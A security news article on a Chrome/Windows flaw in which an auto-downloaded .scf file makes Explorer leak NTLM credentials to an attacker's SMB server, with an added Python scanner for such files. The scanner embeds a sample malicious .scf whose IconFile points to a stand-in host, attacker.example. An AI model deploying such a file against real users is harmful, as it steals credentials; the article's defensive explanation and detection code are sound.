A Google Chrome vulnerability allows attackers to steal Windows login credentials and launch SMB (Server Message Block) relay attacks, according to security researchers. The credential-theft technique combines two previously known tricks: one borrowed from the Stuxnet campaign and one demonstrated at a Black Hat conference by two security researchers.
The Google Chrome vulnerability was uncovered by DefenceCode security engineer Bosko Stankovic, who said in a blog post that he found the flaw in a default configuration of Chrome running on Windows 10.
“Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim’s authentication credentials,” Stankovic said.
He added that this vulnerability poses a threat not just to privileged users such as administrators but also to regular users and organisations, since it “enables the attacker to impersonate members of the organisation”. Attackers can also “immediately reuse” stolen credentials and the privileges they carry to launch further attacks “on other users or gain access and control of IT resources”.
DefenceCode said it had not informed Google about the vulnerability. However, Google told Threatpost that it was aware of the issue and “taking necessary action.”
According to Stankovic, the attack is simple: the victim is tricked into clicking a malicious link, which triggers an automatic download of a Windows Explorer Shell Command File (SCF). The SCF file lies dormant until the victim opens the download folder, at which point Windows Explorer tries to load the file’s icon from a path on the attacker’s server and authenticates to that server in the process. This hands the attacker the victim’s username and an NTLM challenge-response derived from the password, which can be cracked offline or relayed.
Threatpost cited independent security researchers as noting that this flaw is not exclusively tied to how Chrome deals with SCF files; it also relates to how Windows handles them.
“Organisations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password,” Stankovic warned.
.SCF file + SMB Protocol + Google Chrome
One file type that Chrome downloads without prompting is the Windows Explorer Shell Command File (.scf). It supports a few Windows Explorer commands, such as showing the desktop or opening an Explorer window. When a folder containing a .scf file is displayed in Windows Explorer, Explorer fetches the icon named in the file’s IconFile entry.
A .scf file can therefore be used to trick Windows into authenticating to a remote SMB server: the IconFile entry simply points at a UNC path on that server. The contents of such a file look like this:
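As an added example that is not part of the original article or of DefenceCode’s write-up: the constant below is the shape of the .scf file described, with a constructed attacker hostname (attacker.example) standing in for a real server, and the functions around it are the check a defender could run over a Downloads folder to flag .scf files whose IconFile points at a UNC share rather than a local resource. File names and the benign sample are also constructed.

```python
"""Added example: build the kind of .scf file described above and scan a folder for such files.
Hostnames and file names below are constructed placeholders, not data from the article."""
import os
import re
import tempfile

# Constructed sample .scf. Explorer reads IconFile when the containing folder is shown,
# and a UNC path (\\host\share\...) makes it authenticate to that host over SMB.
SAMPLE_SCF = r"""[Shell]
Command=2
IconFile=\\attacker.example\share\icon.ico
[Taskbar]
Command=ToggleDesktop
"""

# Benign .scf with a local icon reference, used to show the scanner does not flag it.
BENIGN_SCF = "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n[Taskbar]\nCommand=ToggleDesktop\n"

# A UNC path starts with two backslashes followed by the host name; capture the host.
UNC_RE = re.compile(r"^\\\\([^\\]+)(?:\\|$)")


def remote_icon_host(text):
    """Return the host named in the [Shell] IconFile entry if it is a UNC path, else None.

    A small line-based parser is used instead of configparser so that odd casing,
    duplicate keys across sections and missing trailing newlines do not raise.
    """
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "shell" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "iconfile":
                match = UNC_RE.match(value.strip())
                if match:
                    return match.group(1)
    return None


def scan_folder(folder):
    """Return a list of (path, host) for every .scf file in folder whose icon is remote."""
    findings = []
    for name in os.listdir(folder):
        if not name.lower().endswith(".scf"):
            continue
        path = os.path.join(folder, name)
        try:
            with open(path, "r", encoding="utf-8", errors="replace") as handle:
                host = remote_icon_host(handle.read())
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        if host:
            findings.append((path, host))
    return findings


def demo():
    """Write both constructed samples into a temporary 'Downloads' folder and scan it."""
    with tempfile.TemporaryDirectory() as folder:
        with open(os.path.join(folder, "invoice.scf"), "w", encoding="utf-8") as handle:
            handle.write(SAMPLE_SCF)
        with open(os.path.join(folder, "showdesktop.scf"), "w", encoding="utf-8") as handle:
            handle.write(BENIGN_SCF)
        return scan_folder(folder)


if __name__ == "__main__":
    for path, host in demo():
        print(f"{path}: Explorer would fetch this icon from remote host {host}")
```

On a real machine the scan target would be the user’s Downloads folder; a file flagged here is one Explorer will authenticate to the moment the folder is opened, so it should be deleted before browsing to it.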
After a user downloads the file, it is triggered as soon as the download folder is opened to view it. Note that the user does not need to click or open the file; Windows Explorer automatically attempts to load the icon.
The rest of the work is done by the remote SMB server, which is controlled by the attacker. The server captures the user’s username and NTLMv2 challenge-response (commonly called the NTLMv2 hash), which can be cracked offline. It can also be configured to relay the connection to another service that accepts NTLM authentication. Practical mitigations are to block outbound SMB (TCP port 445) at the network perimeter, to restrict outgoing NTLM traffic to remote servers via Group Policy, and to configure Chrome to ask where to save each file before downloading so that .scf files are not saved silently.